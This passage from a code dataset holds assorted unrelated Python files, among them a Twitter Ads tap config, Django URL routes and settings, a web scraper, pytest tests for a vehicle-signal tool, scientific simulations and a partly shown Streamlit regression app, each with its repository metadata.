query\n# bookmark_type: Data type for bookmark, integer or datetime\n\n# pylint: disable=line-too-long\nSTREAMS = {\n # Reference: https://developer.twitter.com/en/docs/ads/campaign-management/api-reference/accounts#accounts\n \"accounts\": {\n \"path\": \"accounts\",\n \"data_key\": \"data\",\n \"key_properties\": [\"id\"],\n \"replication_method\": \"FULL_TABLE\",\n \"replication_keys\": [],\n \"params\": {\n \"account_ids\": \"{account_ids}\",\n \"sort_by\": [\"updated_at-desc\"],\n \"with_deleted\": \"{with_deleted}\",\n \"count\": 1000,\n \"cursor\": None,\n },\n },\n # Reference: https://developer.twitter.com/en/docs/ads/campaign-management/api-reference/campaigns#campaigns\n \"campaigns\": {\n \"path\": \"accounts/{account_id}/campaigns\",\n \"data_key\": \"data\",\n \"key_properties\": [\"id\"],\n \"replication_method\": \"FULL_TABLE\",\n \"replication_keys\": [],\n \"params\": {\n \"sort_by\": [\"updated_at-desc\"],\n \"with_deleted\": \"{with_deleted}\",\n \"count\": 1000,\n \"cursor\": None,\n },\n },\n}\n# pylint: enable=line-too-long\n\n# De-nest children nodes for Discovery mode\ndef flatten_streams():\n flat_streams = {}\n # Loop through parents\n for stream_name, endpoint_config in STREAMS.items():\n flat_streams[stream_name] = endpoint_config\n # Loop through children\n children = endpoint_config.get(\"children\")\n if children:\n for child_stream_name, child_endpoint_config in children.items():\n flat_streams[child_stream_name] = child_endpoint_config\n flat_streams[child_stream_name][\"parent_stream\"] = stream_name\n return flat_streams\n","repo_name":"mohitverma24/tap-twitter-ads","sub_path":"tap_twitter_ads/streams.py","file_name":"streams.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5459810286","text":"from django.utils.translation import ugettext_lazy as _\n\nfrom delivery24 import settings\n\n\nif settings.DEBUG:\n CUSTOMER_CONFIRM_WORK_TIMEOUT_S = 60 * 2 # 2 minutes\n DRIVER_FIND_TIMEOUT_S = 60 * 1 # 1 minutes\n PERIODIC_SET_WORK_DONE_S = 10.0 # 10 seconds\n PERIODIC_DELETE_UNCONFIRMED_SIGNUP_S = 60 * 1 # 1 minute\n USER_SIGNUP_CONFIRM_TIMEOUT_S = 60 * 1 # 1 minute\nelse:\n CUSTOMER_CONFIRM_WORK_TIMEOUT_S = 60 * 10 # 10 minutes\n DRIVER_FIND_TIMEOUT_S = 60 * 3 # 3 minutes\n PERIODIC_SET_WORK_DONE_S = 60.0 * 60.0 * 1.0 # 1 hour\n PERIODIC_DELETE_UNCONFIRMED_SIGNUP_S = 60 * 15 # 15 minutes\n USER_SIGNUP_CONFIRM_TIMEOUT_S = 60 * 15 # 15 minutes\n\n#######################################################################\nVERIFF_CODE_LEN = 4\nORDER_ID_LEN = 8\n\nPAYMENT_METHOD_CASH = 0\nPAYMENT_METHOD_BANK = 1\nPAYMENT_METHOD_BOTH = 2\n\n# Below are choices used in User and Order models\nPAYMENT_METHOD = [\n (PAYMENT_METHOD_CASH, _('Cash')),\n # (PAYMENT_METHOD_BANK, _('Bank')),\n # (PAYMENT_METHOD_BOTH, _('Both')),\n]\n\nPREFERRED_LANGUAGE = [\n (1, _('English')),\n (2, _('Russian')),\n (3, _('Estonian')),\n]\n\nCAR_TYPE = [\n (0, _('S')),\n (1, _('M')),\n (2, _('L')),\n]\n\nWORK_STATUS = [\n (1, 'Not started'),\n (2, 'In progress'),\n (3, 'Done'),\n (4, 'Canceled'),\n]\n\n","repo_name":"masb3/delivery24","sub_path":"delivery24/core/proj_conf.py","file_name":"proj_conf.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"36916904399","text":"#220913_boj_2178_미로탐색_실버1_BFS_ pass 코드 (DFS는 시간초과 뜸)\n\ndef bfs(i, j, N, M):\n visited = [[0] * M for _ in range(N)]\n q = []\n q.append((i, j))\n visited[i][j] = 1\n while q:\n i, j = q.pop(0)\n if i == N-1 and j == M-1:\n return visited[i][j]\n for di, dj in [[0, 1], [1, 0], [0, -1], [-1, 0]]:\n ni, nj = i + di, j + dj\n if 0 <= ni < N and 0 <= nj < M and miro[ni][nj] != 0 and visited[ni][nj] == 0:\n q.append((ni, nj))\n visited[ni][nj] = visited[i][j] + 1\n\nN,M = map(int,input().split())\nmiro = [list(map(int,input())) for _ in range(N)]\n\nprint(bfs(0, 0, N, M))\n","repo_name":"burgerfacegirl/Algorithm","sub_path":"boj/2178_miro.py","file_name":"2178_miro.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4349456209","text":"import pytest\nimport os\n\n\n# #################### Helper methods #############################\n\n@pytest.fixture\ndef change_test_dir(request, monkeypatch):\n # To make sure we run from test directory\n monkeypatch.chdir(request.fspath.dirname)\n\n\n@pytest.mark.parametrize(\"format, output_file, comparison_file, is_warning_expected\", [\n ('json', 'out.json', 'expected.json', False),\n ('yaml', 'out.yaml', 'expected.yaml', False),\n ('csv', 'out.csv', 'expected.csv', False),\n ('protobuf', 'out.proto', 'expected.proto', True),\n ('idl', 'out.idl', 'expected.idl', True),\n ('franca', 'out.fidl', 'expected.fidl', True),\n ('graphql', 'out.graphql', 'expected.graphql', True)])\ndef test_no_expand(format, output_file, comparison_file, is_warning_expected: bool, change_test_dir):\n\n args = [\"../../../vspec2x.py\", \"--no-expand\", \"--format\", format]\n if format == 'json':\n args.append('--json-pretty')\n args.extend([\"-u\", \"../test_units.yaml\",\n \"test.vspec\", output_file, \"1>\", \"out.txt\", \"2>&1\"])\n test_str = \" \".join(args)\n\n result = os.system(test_str)\n os.system(\"cat out.txt\")\n assert os.WIFEXITED(result)\n assert os.WEXITSTATUS(result) == 0\n\n # For exporters not supporting \"no-expand\" a warning shall be given\n test_str = 'grep \\\"no_expand not supported by exporter\\\" out.txt > /dev/null'\n result = os.system(test_str)\n assert os.WIFEXITED(result)\n if is_warning_expected:\n assert os.WEXITSTATUS(result) == 0\n else:\n assert os.WEXITSTATUS(result) == 1\n\n test_str = f\"diff {output_file} {comparison_file}\"\n result = os.system(test_str)\n os.system(\"rm -f out.txt\")\n assert os.WIFEXITED(result)\n assert os.WEXITSTATUS(result) == 0\n\n os.system(f\"rm -f {output_file}\")\n\n# Overlay tests, just showing for JSON\n\n\n@pytest.mark.parametrize(\"no_expand, comparison_file\", [\n (False, 'expected_overlay_expand.json'),\n (True, 'expected_overlay_no_expand.json')])\ndef test_json_overlay(no_expand, comparison_file, change_test_dir):\n \"\"\"Test with overlay and expansion (for reference/comparison)\"\"\"\n args = [\"../../../vspec2x.py\"]\n\n if no_expand:\n args.append('--no-expand')\n\n args.extend([\"--format\", \"json\", \"--json-pretty\", \"-u\", \"../test_units.yaml\",\n \"test.vspec\", \"-o\", \"overlay.vspec\", \"out.json\", \"1>\", \"out.txt\", \"2>&1\"])\n test_str = \" \".join(args)\n\n result = os.system(test_str)\n os.system(\"cat out.txt\")\n assert os.WIFEXITED(result)\n assert os.WEXITSTATUS(result) == 0\n\n test_str = f\"diff out.json {comparison_file}\"\n result = os.system(test_str)\n os.system(\"rm -f out.txt\")\n assert os.WIFEXITED(result)\n assert os.WEXITSTATUS(result) == 0\n\n os.system(\"rm -f out.json\")\n","repo_name":"COVESA/vss-tools","sub_path":"tests/vspec/test_no_expand/test_no_expand.py","file_name":"test_no_expand.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"31"} +{"seq_id":"71109252888","text":"from django.urls import path\nfrom .views.category import(\n CategoryCreateView,\n CategoryUpdateView,\n CategoryDeleteView,\n CategoryGetIdView,\n CategoryGetView,\n)\n\nurlpatterns = [\n path('category/create/', CategoryCreateView.as_view()),\n path('category/update//', CategoryUpdateView.as_view()),\n path('category/delete//', CategoryDeleteView.as_view()),\n path('category/get//', CategoryGetIdView.as_view()),\n path('category/get/', CategoryGetView.as_view()),\n]\n\nfrom .views.subcategory import(\n SubCategoryCreateView,\n SubCategoryUpdateView,\n SubCategoryDeleteView,\n SubCategoryGetIdView,\n SubCategoryGetView,\n)\n\nurlpatterns += [\n path('subcategory/create/', SubCategoryCreateView.as_view()),\n path('subcategory/update//', SubCategoryUpdateView.as_view()),\n path('subcategory/delete//', SubCategoryDeleteView.as_view()),\n path('subcategory/get//', SubCategoryGetIdView.as_view()),\n path('subcategory/get/', SubCategoryGetView.as_view()),\n]\n\nfrom .views.product import(\n ProductCreateView,\n ProductUpdateView,\n ProductDeleteView,\n ProductGetIdView,\n ProductGetView,\n ProductGetSubCategoryView,\n ProductGetBrandView,\n)\n\nurlpatterns += [\n path('product/create/', ProductCreateView.as_view()),\n path('product/update//', ProductUpdateView.as_view()),\n path('product/delete//', ProductDeleteView.as_view()),\n path('product/get//', ProductGetIdView.as_view()),\n path('product/get/', ProductGetView.as_view()),\n path('product/get/subcategory//', ProductGetSubCategoryView.as_view()),\n path('product/get/brand//', ProductGetBrandView.as_view()),\n]\n\nfrom .views.productimg import(\n ProductImageCreateView,\n ProductImageUpdateView,\n ProductImageDeleteView,\n ProductImageGetIdView,\n ProductImageGetView,\n)\n\nurlpatterns += [\n path('productimage/create/', ProductImageCreateView.as_view()),\n path('productimage/update//', ProductImageUpdateView.as_view()),\n path('productimage/delete//', ProductImageDeleteView.as_view()),\n path('productimage/get//', ProductImageGetIdView.as_view()),\n path('productimage/get/', ProductImageGetView.as_view()),\n]\n\nfrom .views.like import(\n LikeCreateView,\n LikeDeleteView,\n)\n\nurlpatterns += [\n path('like/create/', LikeCreateView.as_view()),\n path('like/delete//', LikeDeleteView.as_view()),\n]\n\nfrom .views.card import(\n CardCreateView,\n CardUpdateView,\n CardDeleteView,\n CardGetIdView,\n CardGetView,\n)\n\nurlpatterns += [\n path('card/create/', CardCreateView.as_view()),\n path('card/update//', CardUpdateView.as_view()),\n path('card/delete//', CardDeleteView.as_view()),\n path('card/get//', CardGetIdView.as_view()),\n path('card/get/', CardGetView.as_view()),\n]\n\nfrom .views.order import(\n OrderCreateView,\n OrderDeleteView,\n OrderGetView,\n)\n\nurlpatterns += [\n path('order/create/', OrderCreateView.as_view()),\n path('order/delete//', OrderDeleteView.as_view()),\n path('order/get/', OrderGetView.as_view()),\n]\n\nfrom .views.certificate import(\n CertificateCreateView,\n CertificateUpdateView,\n CertificateGetView,\n CertificateGetIdView,\n CertificateDeleteView,\n)\n\nurlpatterns += [\n path('certificate/create/', CertificateCreateView.as_view()),\n path('certificate/update//', CertificateUpdateView.as_view()),\n path('certificate/get/', CertificateGetView.as_view()),\n path('certificate/get//', CertificateGetIdView.as_view()),\n path('certificate/delete//', CertificateDeleteView.as_view()),\n]\n\nfrom .views.contaket import(\n ContaketCreateView,\n ContaketUpdateView,\n ContaketGetView,\n ContaketGetIdView,\n ContaketDeleteView,\n)\n\nurlpatterns += [\n path('contaket/create/', ContaketCreateView.as_view()),\n path('contaket/update//', ContaketUpdateView.as_view()),\n path('contaket/get/', ContaketGetView.as_view()),\n path('contaket/get//', ContaketGetIdView.as_view()),\n path('contaket/delete//', ContaketDeleteView.as_view()),\n]\n\nfrom .views.about import(\n AboutCreateView,\n AboutUpdateView,\n AboutGetView,\n AboutGetIdView,\n AboutDeleteView,\n)\n\nurlpatterns += [\n path('about/create/', AboutCreateView.as_view()),\n path('about/update//', AboutUpdateView.as_view()),\n path('about/get/', AboutGetView.as_view()),\n path('about/get//', AboutGetIdView.as_view()),\n path('about/delete//', AboutDeleteView.as_view()),\n]\n\nfrom .views.companyquestion import(\n CompanyQuestionCreateView,\n CompanyQuestionUpdateView,\n CompanyQuestionGetView,\n CompanyQuestionGetIdView,\n CompanyQuestionDeleteView,\n)\n\nurlpatterns += [\n path('companyquestion/create/', CompanyQuestionCreateView.as_view()),\n path('companyquestion/update//', CompanyQuestionUpdateView.as_view()),\n path('companyquestion/get/', CompanyQuestionGetView.as_view()),\n path('companyquestion/get//', CompanyQuestionGetIdView.as_view()),\n path('companyquestion/delete//', CompanyQuestionDeleteView.as_view()),\n]\n\nfrom .views.home import(\n HomeView,\n SearchView,\n)\n\nurlpatterns += [\n path('', HomeView.as_view()),\n path('search/', SearchView.as_view()),\n]\n\nfrom .views.userauth import(\n UserCreateView,\n UserLoginView,\n UserLogOutView,\n UserListView,\n UserAddAdminView,\n UserDeleteAdminView,\n)\n\nurlpatterns += [\n path('user/create/', UserCreateView.as_view()),\n path('user/login/', UserLoginView.as_view()),\n path('user/logout/', UserLogOutView.as_view()),\n path('user/list/', UserListView.as_view()),\n path('user/add/admin//', UserAddAdminView.as_view()),\n path('user/delete/admin//', UserDeleteAdminView.as_view()),\n]\n\nfrom .views.callback import(\n CallBackCreateView,\n CallBackDeleteView,\n CallBackListView,\n CallBackDetailView,\n CallBackUpdateView,\n)\n\nurlpatterns += [\n path('callback/create/', CallBackCreateView.as_view()),\n path('callback/delete//', CallBackDeleteView.as_view()),\n path('callback/list/', CallBackListView.as_view()),\n path('callback/detail//', CallBackDetailView.as_view()),\n path('callback/update//', CallBackUpdateView.as_view()),\n]\n\nfrom .views.brand import(\n BrandCreateView,\n BrandDeleteView,\n BrandListView,\n BrandDetailView,\n BrandUpdateView,\n)\n\nurlpatterns += [\n path('brand/create/', BrandCreateView.as_view()),\n path('brand/delete//', BrandDeleteView.as_view()),\n path('brand/list/', BrandListView.as_view()),\n path('brand/detail//', BrandDetailView.as_view()),\n path('brand/update//', BrandUpdateView.as_view()),\n]\n","repo_name":"quvvatullayev/maxcom","sub_path":"maxcom/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":6830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22450200072","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom profession_2.items import Profession2Item_scale\n\n\nclass ScaleSpider(scrapy.Spider):\n name = 'scale'\n #allowed_domains = ['ios.com']\n start_urls = ['http://www.kaoshidian.com/kaoyan/bl-0-0-0-0-0.html?q=%E8%AE%A1%E7%AE%97%E6%9C%BA']\n\n def parse(self, response):\n demo=response.xpath(\"//table[@class='zhdetail']/tr\")\n Demo=demo[2:]\n\n for list in Demo:\n item=Profession2Item_scale()\n list_td = list.xpath(\"./td/text()\").extract()\n list_td_a = list.xpath(\"./td/a/text()\").extract()\n\n item[\"year\"] = list_td[0]\n item[\"area\"] = list_td[1]\n item[\"school_name\"] = list_td_a[0]\n item[\"profession_name\"] = list_td[2]\n item[\"marjon_code\"] = list_td[3]\n item[\"marjon_name\"] = list_td_a[1]\n try:\n item[\"enroll_sum\"] = list_td[4]\n except:\n item[\"enroll_sum\"] = \" \"\n try:\n item[\"admit_sum\"] = list_td[5]\n except:\n item[\"admit_sum\"] = \" \"\n try:\n item[\"scale_admit\"] = list_td[6]\n except:\n item[\"scale_admit\"] = \" \"\n try:\n item[\"excuse_sum\"] = list_td[7]\n except:\n item[\"excuse_sum\"] = \" \"\n yield item\n","repo_name":"SelmerZhang/Code","sub_path":"Python/profession_2/profession_2/spiders/scale.py","file_name":"scale.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39211108469","text":"import pyterrier as pt\nimport pandas as pd\nif not pt.started():\n pt.init() \n\n# Index path\nindex_loc = \"./index\"\n\n#Read the collection file and drop empty lines\ndf = pd.read_csv('./data/collection.tsv', sep='\\t', names=['docno', 'text'],dtype=str, encoding='utf-8')\ndf.dropna(inplace=True)\n\n# Dfine the IterDictIndexer\nindexer = pt.IterDictIndexer(index_loc, meta={\"docno\": 20, \"text\": 4096}, overwrite=True, verbose=True, tokeniser=\"UTFTokeniser\")\n\n# Trigger the indexing process\nindex = indexer.index(df.to_dict(orient=\"records\"))","repo_name":"Nilhenrik/dat640_group_project","sub_path":"indexingBaseline.py","file_name":"indexingBaseline.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6850809197","text":"import tensorflow_datasets as tfds\nimport numpy as np\n\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.pipeline import make_pipeline\n\ndef get_dsprites_tf_dataset():\n # data have been shuffled by tensorflow\n # data will be batched before training\n return tfds.load('Dsprites', split='train', batch_size=256)\n\nclass OrderedDsprites:\n def __init__(self, data_file='dsprites_ordered.npz'):\n # load dataset\n dataset = np.load(data_file, allow_pickle=True, encoding=\"latin1\")\n self.imgs = dataset[\"imgs\"][:]\n self.latent_sizes = dataset[\"metadata\"][()][\"latents_sizes\"][:]\n # get rid of color dimension here\n self.latent_sizes = self.latent_sizes[1:]\n self.latent_bases = np.concatenate((\n self.latent_sizes[::-1].cumprod()[::-1][1:], np.array([1,]),))\n\n def sample_latent(self, nsamples=1):\n samples = np.zeros((nsamples, self.latent_sizes.size), dtype=int)\n for lat_i, lat_size in enumerate(self.latent_sizes):\n samples[:, lat_i] = np.random.randint(lat_size, size=nsamples)\n return samples\n\n def get_images_from_latent(self, latent_samples):\n # latent to indices\n indices = np.dot(latent_samples, self.latent_bases).astype(int)\n return self.imgs[indices]\n \n def compute_zdiff_y(self, bvae, n_zdiff_per_y, n_img_per_zdiff):\n # create arrays\n y_size = self.latent_sizes.size\n z_diff_all = np.zeros((y_size, n_zdiff_per_y, bvae.latent_dim))\n y_all = np.zeros((y_size, n_zdiff_per_y), dtype=int)\n \n for y in range(y_size):\n # sample\n v1 = self.sample_latent(n_zdiff_per_y * n_img_per_zdiff)\n v2 = self.sample_latent(n_zdiff_per_y * n_img_per_zdiff)\n # keey y the same\n v1[:, y] = v2[:, y]\n # get images\n x1 = self.get_images_from_latent(v1)\n x2 = self.get_images_from_latent(v2)\n # encode \n z1 = bvae.encoder.predict(x1)[0]\n z2 = bvae.encoder.predict(x2)[0]\n # z_diff\n z_diff = np.abs(z1 - z2)\n # separate dimensions: n_zdiff_per_y, n_img_per_zdiff\n z_diff = z_diff.reshape((n_zdiff_per_y, n_img_per_zdiff, bvae.latent_dim))\n # take average over n_img_per_zdiff\n z_diff_all[y, :, :] = np.mean(z_diff, axis=1)\n # y\n y_all[y, :] = y\n \n # merge dimensions: y_size, n_zdiff_per_y\n z_diff_all = z_diff_all.reshape((y_size * n_zdiff_per_y, bvae.latent_dim))\n y_all = y_all.reshape((y_size * n_zdiff_per_y))\n \n # shuffle z_diff and y consistently\n shuffle_indices = np.arange(0, y_size * n_zdiff_per_y)\n np.random.shuffle(shuffle_indices)\n z_diff_all = z_diff_all[shuffle_indices]\n y_all = y_all[shuffle_indices]\n return z_diff_all, y_all\n \n def compute_disentangle_metric_score(self, bvae, n_zdiff_per_y=5000, \n n_img_per_zdiff=64, random_seed=0):\n # seed\n np.random.seed(random_seed)\n # prep training and test data\n zdiff, y = self.compute_zdiff_y(bvae, n_zdiff_per_y, n_img_per_zdiff)\n # sklearn linear classifier\n classifier = make_pipeline(\n StandardScaler(), \n SGDClassifier(loss=\"log\", early_stopping=True, random_state=random_seed)\n )\n # train\n classifier.fit(zdiff, y)\n # score with test data\n return classifier.score(zdiff, y)\n","repo_name":"jamesacris/constrained-vae","sub_path":"dSprites_epsilon_VAE/dsprites_data.py","file_name":"dsprites_data.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36606179725","text":"from AOC_19.IntComputer import IntProcess\n\n\ndef update_screen(pixels, screen=dict()):\n for i in range(0, len(pixels), 3):\n screen[(pixels[i], pixels[i + 1])] = pixels[i + 2]\n return screen\n\n\ndef display(screen):\n for y in range(max([pixel[1] for pixel in screen.keys()]) + 1):\n row = \"\"\n for x in range(max([pixel[0] for pixel in screen.keys()]) + 1):\n row = row + str(screen[(x, y)])\n print(row)\n print(\"Score:\", screen[(-1, 0)])\n\n\ndef loc(obj, screen):\n for y in range(max([pixel[1] for pixel in screen.keys()]) + 1):\n for x in range(max([pixel[0] for pixel in screen.keys()]) + 1):\n if screen[(x, y)] == obj:\n return x, y\n\n\nscreen = update_screen(IntProcess(open(\"input\")).run())\n\nprint(\"Part 1:\", sum([pixel == 2 for pixel in screen.values()]))\n\ngame = IntProcess(open(\"input\"))\ngame.prog[0] = 2\nwhile game.ip != -1 and sum([pixel == 2 for pixel in screen.values()]) > 0:\n b_x, b_y = loc(4, screen)\n p_x, _ = loc(3, screen)\n if p_x < b_x:\n inp = 1\n elif p_x > b_x:\n inp = -1\n else:\n inp = 0\n screen = update_screen(game.run([inp]), screen)\n # display(screen)\n\nprint(\"Part 2:\")\ndisplay(screen)\n\n\n\n","repo_name":"evanphoward/AdventOfCode","sub_path":"AOC_19/Day13/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"6580741273","text":"from neuron import h\nimport numpy as np\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pylab as plt\n\n## \n## Simulation of the electrophysiology of the beta-cell.\n## Using package NEURON yale.\n## \n## Created by Chon Lei\n## The currently version is based on the model from \n## Cha et al. 2011\n## Last updated: 25/03/2017\n## \n\n\n## Import system setup files (.hoc files)\nh.load_file (\"betacell.hoc\")\n\n\n## System set-up\nprint(\"*************************\")\nprint(\"Testing system: two coupled beta cells.\")\nprint(\"Starting system set-up...\")\nbetacell = h.betacell()\nvarp = 0.1\nHetDictCha2011 = {'gkca':(2.13, varp), \\\n 'gkatp':(2.31, varp*2.5), \\\n 'pserca':(0.096, varp), \\\n 'prel':(0.46, varp), \\\n 'kglc':(0.000126, varp), \\\n 'kbox':(0.0000063, varp), \\\n 'pop':(0.0005, varp), \\\n 'atptot':(4.0, varp)}\nbetacell.soma(0.5).GKto_bcellcha = HetDictCha2011['gkca'][0]*( 1.0 + np.random.normal(0.0,1.0)*HetDictCha2011['gkca'][1] )\nbetacell.soma(0.5).gKATP_bcellcha = HetDictCha2011['gkatp'][0]*( 1.0 + np.random.normal(0.0,1.0)*HetDictCha2011['gkatp'][1] )\nbetacell.soma(0.5).PCaER_bcellcha = HetDictCha2011['pserca'][0]*( 1.0 + np.random.normal(0.0,1.0)*HetDictCha2011['pserca'][1] )\nbetacell.soma(0.5).Pleak_bcellcha =HetDictCha2011['prel'][0]*( 1.0 + np.random.normal(0.0,1.0)*HetDictCha2011['prel'][1] )\nbetacell.soma(0.5).KRe_bcellcha = HetDictCha2011['kglc'][0]*( 1.0 + np.random.normal(0.0,1.0)*HetDictCha2011['kglc'][1] )\nbetacell.soma(0.5).Kfa_bcellcha = HetDictCha2011['kbox'][0]*( 1.0 + np.random.normal(0.0,1.0)*HetDictCha2011['kbox'][1] )\nbetacell.soma(0.5).Pop_bcellcha = HetDictCha2011['pop'][0]*( 1.0 + np.random.normal(0.0,1.0)*HetDictCha2011['pop'][1] )\nbetacell.soma(0.5).totalATP_bcellcha = HetDictCha2011['atptot'][0]*( 1.0 + np.random.normal(0.0,1.0)*HetDictCha2011['atptot'][1] )\nbetacell.soma(0.5).gammaapplytime_bcellcha = 5e2\nbetacell.soma(0.5).gammatoset_bcellcha = 8.0\n\n## External stimulation\n'''\nstimulus = h.IClamp (0.5, sec = betacell.soma)\nstimulus.delay = 100\nstimulus.dur = 300\nstimulus.amp = 0.1 \n'''\n\n\n## System recorder initialisation\ntime = h.Vector()\ntime.record(h._ref_t)\n\nvm1 = h.Vector()\nvm1.record (betacell.soma(0.5)._ref_v)\n\"\"\"\natp = h.Vector()\natp.record (betacell.soma(0.5)._ref_atpi)\nadp = h.Vector()\nadp.record (betacell.soma(0.5)._ref_mgadpi)\n\n\"\"\"\nca = h.Vector()\nca.record (betacell.soma(0.5)._ref_cai)\n\nna = h.Vector()\nna.record (betacell.soma(0.5)._ref_nai)\nk = h.Vector()\nk.record (betacell.soma(0.5)._ref_ki)\n\n## Main simulation\nh.load_file(\"stdrun.hoc\")\nh.init()\n#h.v_init = -48.9045 #-69.8663703359279 or #-48.9045\nh.tstop = 25e4\nh.dt = 0.1\nh.steps_per_ms = 1./h.dt\nprint(\"Starting main simulation...\")\nh.run()\nprint(\"Simulation completed! :)\")\nprint(\"*************************\")\n\n\n## Exporting\n\n\n## Visualisation\ntime = np.array(time)\n\nplt.figure(1)\nvm1 = np.array(vm1)\nplt.plot(time, vm1, 'r-',label='cell1')\nplt.legend()\nplt.title(\"V\", fontsize=20)\nplt.xlabel(\"time [ms]\", fontsize=20)\nplt.ylabel(\"V [mV]\", fontsize=20)\nplt.savefig(\"test.png\")\n\"\"\"\nplt.figure(2)\natp = np.array(atp)\nplt.plot(time, atp, 'b-',label='atp')\nplt.legend()\nplt.title(\"ATP\", fontsize=20)\nplt.xlabel(\"time [ms]\", fontsize=20)\nplt.ylabel(\"conc [mM]\", fontsize=20)\n\n\nplt.figure(3)\nadp = np.array(adp)\nplt.plot(time, adp, 'r-',label='adp')\nplt.legend()\nplt.title(\"MgADP\", fontsize=20)\nplt.xlabel(\"time [ms]\", fontsize=20)\nplt.ylabel(\"conc [mM]\", fontsize=20)\n\n\"\"\"\nplt.figure(4)\nca = np.array(ca)\nplt.plot(time, ca, 'r-',label='Ca')\nplt.legend()\nplt.title(\"Ca\", fontsize=20)\nplt.xlabel(\"time [ms]\", fontsize=20)\nplt.ylabel(\"conc [mM]\", fontsize=20)\n\n\nplt.figure(5)\nna = np.array(na)\nplt.plot(time, na, 'b-',label='Na')\n#k = np.array(k)\n#plt.plot(time, k, 'k-',label='K')\nplt.legend()\nplt.title(\"Na\", fontsize=20)\nplt.xlabel(\"time [ms]\", fontsize=20)\nplt.ylabel(\"conc [mM]\", fontsize=20)\n\n\nplt.show()\n","repo_name":"chonlei/bHub_sim","sub_path":"models/betacell_cha2011_vMetabolic/main-test.py","file_name":"main-test.py","file_ext":"py","file_size_in_byte":4049,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"36684703516","text":"# Import the Libraries\r\nimport streamlit as st\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom PIL import Image, ImageOps # Image processing\r\nimport pickle\r\nimport sklearn\r\nfrom sklearn.model_selection import train_test_split\r\nimport base64\r\n#####################################################################################################################\r\ndef download_link(object_to_download, download_filename, download_link_text):\r\n \r\n if isinstance(object_to_download,pd.DataFrame):\r\n object_to_download = object_to_download.to_csv(index=False)\r\n\r\n # some strings <-> bytes conversions necessary here\r\n b64 = base64.b64encode(object_to_download.encode()).decode()\r\n\r\n return f'{download_link_text}'\r\n#####################################################################################################################\r\n\r\n#Create a title and a sub-title\r\nst.write(\"\"\"\r\n# Universal ML Regressor\r\nSci Kit Learn Based ML Web App for Regression Applications\r\n\"\"\")\r\n\r\n#Open and Display an Image\r\n#image = Image.open('/content/gdrive/My Drive/Machine Learning Web Application/Diabetes Detection/Diabetes Detection.png')\r\n#st.image(image, use_column_width=True) # caption = 'ML', \r\n\r\nst.write(\"import csv dataset, that does not have any string predictors or missing values\")\r\nst.write(\"csv file must have target variable in the rightmost column, and the remaining predictors to the left\")\r\n\r\n# COMPUTATION\r\nst.sidebar.header('User Input Dataset and Parameters')\r\n\r\n\r\nst.sidebar.markdown(\"\"\"\r\n[Example CSV input file](https://drive.google.com/file/d/16iVua1vtUVvRno8lmTH_ZQ7f964OXDiU/view?usp=sharing)\r\n\"\"\")\r\nuploaded_file = st.sidebar.file_uploader(\"Upload your input CSV file\", type=[\"csv\"])\r\n\r\nsplit_ratio = st.sidebar.slider('Train Test Split Ratio (Input Test Percentage)', 0, 100, 80, 10)\r\nsplit_ratio = split_ratio/100\r\nmodel = st.selectbox('ML Regressor Model', ('Linear Regression', 'Polynomial Regression', 'SVM Support Vector Machine', 'Decision Tree', 'Random Forest', 'XG Boost'))\r\n\r\n\r\nif uploaded_file is not None:\r\n\r\n dataset = pd.read_csv(uploaded_file)\r\n X = dataset.iloc[:, :-1].values\r\n y = dataset.iloc[:, -1].values\r\n\r\n #Splitting the dataset into Training and Testing Set\r\n from sklearn.model_selection import train_test_split\r\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = split_ratio, random_state = 0)\r\n\r\n if model == 'Linear Regression':\r\n from sklearn.linear_model import LinearRegression\r\n regressor = LinearRegression()\r\n regressor.fit(X_train, y_train)\r\n elif model == 'Polynomial Regression':\r\n poly_degree = st.sidebar.slider('Polynomial Regressor Degree', 0, 5, 2)\r\n from sklearn.linear_model import LinearRegression\r\n regressor = LinearRegression()\r\n regressor.fit(X, y)\r\n from sklearn.preprocessing import PolynomialFeatures\r\n poly_reg = PolynomialFeatures(degree = poly_degree)\r\n X_poly = poly_reg.fit_transform(X)\r\n regressor = LinearRegression()\r\n regressor.fit(X_poly, y)\r\n elif model == 'SVM Support Vector Machine':\r\n from sklearn.svm import SVR\r\n regressor = SVR(kernel = 'rbf')\r\n regressor.fit(X, y)\r\n elif model == 'Decision Tree':\r\n from sklearn.tree import DecisionTreeRegressor\r\n regressor = DecisionTreeRegressor(random_state = 0)\r\n regressor.fit(X, y)\r\n elif model == 'Random Forest':\r\n from sklearn.ensemble import RandomForestRegressor\r\n regressor = RandomForestRegressor(n_estimators = 10, random_state = 0)\r\n regressor.fit(X, y)\r\n elif model == 'XG Boost':\r\n from xgboost import XGBRegressor\r\n regressor = XGBRegressor()\r\n regressor.fit(X_train, y_train)\r\n else:\r\n from sklearn.linear_model import LinearRegression\r\n regressor = LinearRegression()\r\n regressor.fit(X_train, y_train)\r\n\r\n st.subheader('Trained Model Results')\r\n #from sklearn.metrics import 